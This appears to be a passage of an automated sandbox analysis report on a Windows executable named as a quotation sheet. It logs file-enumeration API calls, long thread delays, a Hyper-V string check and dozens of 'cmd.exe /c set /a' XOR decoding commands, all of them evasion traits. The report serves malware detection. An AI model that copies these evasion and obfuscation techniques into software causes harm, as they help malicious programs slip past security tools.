            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00406167 FindFirstFileA,FindClose, 131_2_00406167
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 131_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 131_2_00402688 FindFirstFileA, 131_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Thread delayed: delay time: 600000
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | API call chain: ExitProcess graph end node graph_0-4233
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | API call chain: ExitProcess graph end node graph_0-4398
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: unknown unknown
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
